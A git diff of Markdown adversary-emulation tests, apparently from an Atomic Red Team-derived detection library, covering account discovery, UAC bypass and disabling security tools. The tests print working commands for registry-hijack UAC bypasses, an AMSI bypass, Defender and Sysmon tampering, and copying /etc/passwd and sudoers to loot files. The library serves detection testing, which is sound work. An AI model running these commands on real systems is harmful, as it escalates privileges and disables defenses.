## Atomic Test #12 - PowerShell Downgrade Attack -Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - -**Supported Platforms:** Windows - - - +Attempts to run powershell commands in version +2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ -#### Attack Commands: Run with `powershell`! +**Supported Platforms:** Windows +#### Attack Commands: Run with `powershell`! ```powershell powershell.exe -version 2 -Command Write-Host $PSVersion ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: PowerShell version 2 must be installed + ##### Check Prereq Commands: + ```powershell if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Automated installer not implemented yet, please install PowerShell v2 manually ``` - - -

## Atomic Test #13 - NTFS Alternate Data Stream Access -Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. - -**Supported Platforms:** Windows - +Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data +Executed" will be displayed. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand' @@ -420,24 +338,25 @@ Invoke-Expression $streamcommand ``` #### Cleanup Commands: + ```powershell Remove-Item #{ads_file} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Homedrive must be an NTFS drive + ##### Check Prereq Commands: + ```powershell if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell Write-Host Prereq's for this test cannot be met automatically ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1087.md b/Atomic_Threat_Coverage/Triggers/T1087.md
index e1bd20f9..c1992422 100644
--- a/Atomic_Threat_Coverage/Triggers/T1087.md
+++ b/Atomic_Threat_Coverage/Triggers/T1087.md
@@ -1,28 +1,43 @@ # T1087 - Account Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087) +
Adversaries may attempt to get a listing of local system or domain accounts. ### Windows -Example commands that can acquire this information are net user, net group , and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply. +Example commands that can acquire this information are net user, net group , +and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility or through +use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, +currently logged in user, or set of users that commonly uses a +system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply. ### Mac -On Mac, groups can be enumerated through the groups and id commands. In mac specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate groups and users. +On Mac, groups can be enumerated through the groups and id commands. In mac +specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate +groups and users. ### Linux -On Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. In mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file. +On Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. In +mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file. Also, groups can be enumerated through the groups and id commands. ### Office 365 and Azure AD -With authenticated access there are several tools that can be used to find accounts. 
The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) +With authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember +PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft +msolrolemember)(Citation: GitHub Raindance) -Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) +Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The +command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black +Hills Red Teaming MS AD Azure, 2018) -The Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+The Get-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a +domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking +Exchange MailSniper, 2016) ## Atomic Tests @@ -48,185 +63,130 @@ The Get-GlobalAddressList PowerShell cmdlet can be used to obtain e - [Atomic Test #11 - Enumerate logged on users via PowerShell](#atomic-test-11---enumerate-logged-on-users-via-powershell) -
## Atomic Test #1 - Enumerate all accounts + Enumerate all accounts by copying /etc/passwd to another file **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cat /etc/passwd > #{output_file} ``` - - - - -

## Atomic Test #2 - View sudoers access + (requires root) **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cat /etc/sudoers > #{output_file} ``` - - - - -

## Atomic Test #3 - View accounts with UID 0 + View accounts wtih UID 0 **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh grep 'x:0:' /etc/passwd > #{output_file} ``` - - - - -

## Atomic Test #4 - List opened files by user + List opened files by user **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ``` - - - - -

## Atomic Test #5 - Show if a user account has ever logged in remotely + Show if a user account has ever logged in remotely **Supported Platforms:** Linux - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh lastlog > #{output_file} ``` - - - - -

## Atomic Test #6 - Enumerate users and groups + Utilize groups and id to enumerate users and groups **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh groups id ``` - - - - -

## Atomic Test #7 - Enumerate users and groups + Utilize local utilities to enumerate users and groups **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh dscl . list /Groups @@ -236,26 +196,17 @@ dscacheutil -q group dscacheutil -q user ``` - - - - -

## Atomic Test #8 - Enumerate all accounts + Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net user @@ -266,25 +217,16 @@ net localgroup "Users" net localgroup ``` - - - - -

## Atomic Test #9 - Enumerate all accounts via PowerShell + Enumerate all accounts via PowerShell **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell net user @@ -300,57 +242,34 @@ get-localgroup net localgroup ``` - - - - -

## Atomic Test #10 - Enumerate logged on users + Enumerate logged on users **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd query user ``` - - - - -

## Atomic Test #11 - Enumerate logged on users via PowerShell + Enumerate logged on users via PowerShell **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell query user ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1088.md b/Atomic_Threat_Coverage/Triggers/T1088.md
index a9c7b962..12723b4d 100644
--- a/Atomic_Threat_Coverage/Triggers/T1088.md
+++ b/Atomic_Threat_Coverage/Triggers/T1088.md
@@ -1,14 +1,28 @@ # T1088 - Bypass User Account Control + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1088) +
Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) -If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. +If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed +to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification +box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a +specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory +which would typically require elevated access. Malicious software may also be injected into a trusted process to gain +elevated privileges without prompting a user. 
(Citation: Davidson Windows) Adversaries can use these techniques to +elevate privileges to administrator if the target process is unprotected. -Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: +Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of +methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive +list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: -* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit) +* eventvwr.exe can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC + Bypass) (Citation: Fortinet Fareit) -Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)
+Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator +privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process +running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC +Bypass) ## Atomic Tests @@ -24,26 +38,23 @@ Another bypass is possible through some Lateral Movement techniques if credentia - [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories) -
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) -Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here +- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f @@ -51,34 +62,29 @@ cmd.exe /c eventvwr.msc ``` #### Cleanup Commands: + ```cmd reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 ``` - - - -

## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) -PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More +information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force @@ -87,33 +93,27 @@ Start-Process "C:\Windows\System32\eventvwr.msc" ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #3 - Bypass UAC using Fodhelper + Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f @@ -122,33 +122,28 @@ fodhelper.exe ``` #### Cleanup Commands: + ```cmd reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 ``` - - - -

## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell -PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - -**Supported Platforms:** Windows - +PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires +Windows 10. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force @@ -158,34 +153,28 @@ Start-Process "C:\Windows\System32\fodhelper.exe" ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) + PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force @@ -195,34 +184,30 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe" ``` #### Cleanup Commands: + ```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` - - - -

## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories -Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems -Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch - -**Supported Platforms:** Windows - +Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched +systems +Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console +should launch +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd mkdir "\\?\C:\Windows \System32\" @@ -231,13 +216,10 @@ mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" ``` #### Cleanup Commands: + ```cmd rd "\\?\C:\Windows \" /S /Q >nul 2>nul del "c:\testbypass.exe" >nul 2>nul ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1089.md b/Atomic_Threat_Coverage/Triggers/T1089.md
index a34c2659..ce26a13f 100644
--- a/Atomic_Threat_Coverage/Triggers/T1089.md
+++ b/Atomic_Threat_Coverage/Triggers/T1089.md
@@ -1,5 +1,7 @@ # T1089 - Disabling Security Tools + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089) +
Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
## Atomic Tests
@@ -44,20 +46,15 @@ - [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files) -
## Atomic Test #1 - Disable iptables firewall + Disables the iptables firewall **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -72,25 +69,16 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` - - - - -

## Atomic Test #2 - Disable syslog + Disables syslog collection **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -103,25 +91,16 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` - - - - -

## Atomic Test #3 - Disable Cb Response + Disable the Cb Response service **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; @@ -134,133 +113,91 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; fi ``` - - - - -

## Atomic Test #4 - Disable SELinux + Disables SELinux enforcement **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh setenforce 0 ``` - - - - -

## Atomic Test #5 - Disable Carbon Black Response + Disables Carbon Black Response **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist ``` - - - - -

## Atomic Test #6 - Disable LittleSnitch + Disables LittleSnitch **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ``` - - - - -

## Atomic Test #7 - Disable OpenDNS Umbrella + Disables OpenDNS Umbrella **Supported Platforms:** macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ``` - - - - -

## Atomic Test #8 - Unload Sysmon Filter Driver -Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, + +Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o +verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd fltmc.exe unload #{sysmon_driver} ``` #### Cleanup Commands: + ```cmd sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 
@@ -268,116 +205,121 @@ sysmon -i -accepteula -i > nul 2>&1 %temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Sysmon must be downloaded + ##### Check Prereq Commands: + ```powershell if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force ``` + ##### Description: sysmon must be Installed + ##### Check Prereq Commands: + ```powershell if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } ``` + ##### Get Prereq Commands: + ```powershell if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} ``` + ##### Description: sysmon filter must be loaded + ##### Check Prereq Commands: + ```powershell if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } ``` + ##### Get Prereq Commands: + ```powershell sysmon -u sysmon -accepteula -i ``` - - -

## Atomic Test #9 - Disable Windows IIS HTTP Logging + Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | website_name | The name of the website on a server | string | Default Web Site| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true ``` #### Cleanup Commands: + ```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false ``` - - - -

## Atomic Test #10 - Uninstall Sysmon + Uninstall Sysinternals Sysmon for Defense Evasion **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1089\bin\sysmon.exe| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sysmon -u ``` #### Cleanup Commands: + ```cmd sysmon -i -accepteula >nul 2>&1 ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Sysmon executable must be available + ##### Check Prereq Commands: + ```powershell if(cmd /c where sysmon) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -385,96 +327,82 @@ Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} ``` + ##### Description: Sysmon must be installed + ##### Check Prereq Commands: + ```powershell if(cmd /c sc query sysmon) { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```powershell cmd /c sysmon -i -accepteula ``` - - -

## Atomic Test #11 - AMSI Bypass - AMSI InitFailed + Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` #### Cleanup Commands: + ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) -ErrorAction Ignore ``` - - - -

## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key -With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. + +With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to +disable AMSI inspection. This test removes the Windows Defender provider registry key. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse ``` #### Cleanup Commands: + ```powershell New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null ``` - - - -

## Atomic Test #13 - Disable Arbitrary Security Windows Service + With administrative rights, an adversary can disable Windows Services related to security products. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | The name of the service to stop | String | McAfeeDLPAgentService| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd net.exe stop #{service_name} @@ -482,31 +410,24 @@ sc.exe config #{service_name} start= disabled ``` #### Cleanup Commands: + ```cmd sc.exe config #{service_name} start= auto >nul 2>&1 net.exe start #{service_name} >nul 2>&1 ``` - - - -

## Atomic Test #14 - Disable PowerShell Script Block Logging + An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. Credit to Matt Graeber (@mattifestation) for the research. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') @@ -516,6 +437,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] ``` #### Cleanup Commands: + ```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) @@ -523,51 +445,35 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1 $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1 ``` - - - -

## Atomic Test #15 - PowerShell Bypass of AntiMalware Scripting Interface + An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. Credit to Matt Graeber (@mattifestation) for the research. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` - - - - -

## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell -Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled + +Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat +Protection will show as disabled in Windows settings. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Set-MpPreference -DisableRealtimeMonitoring 1 @@ -577,6 +483,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 1 ``` #### Cleanup Commands: + ```powershell Set-MpPreference -DisableRealtimeMonitoring 0 Set-MpPreference -DisableBehaviorMonitoring 0 @@ -584,25 +491,19 @@ Set-MpPreference -DisableScriptScanning 0 Set-MpPreference -DisableBlockAtFirstSeen 0 ``` - - - -

## Atomic Test #17 - Tamper with Windows Defender Command Prompt -Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. -However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. - -**Supported Platforms:** Windows +Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, +so they still fail as administrator. +However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad +things going on. +**Supported Platforms:** Windows - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc stop WinDefend @@ -611,62 +512,49 @@ sc query WinDefend ``` #### Cleanup Commands: + ```cmd sc start WinDefend >nul 2>&1 sc config WinDefend start=enabled >nul 2>&1 ``` - - - -

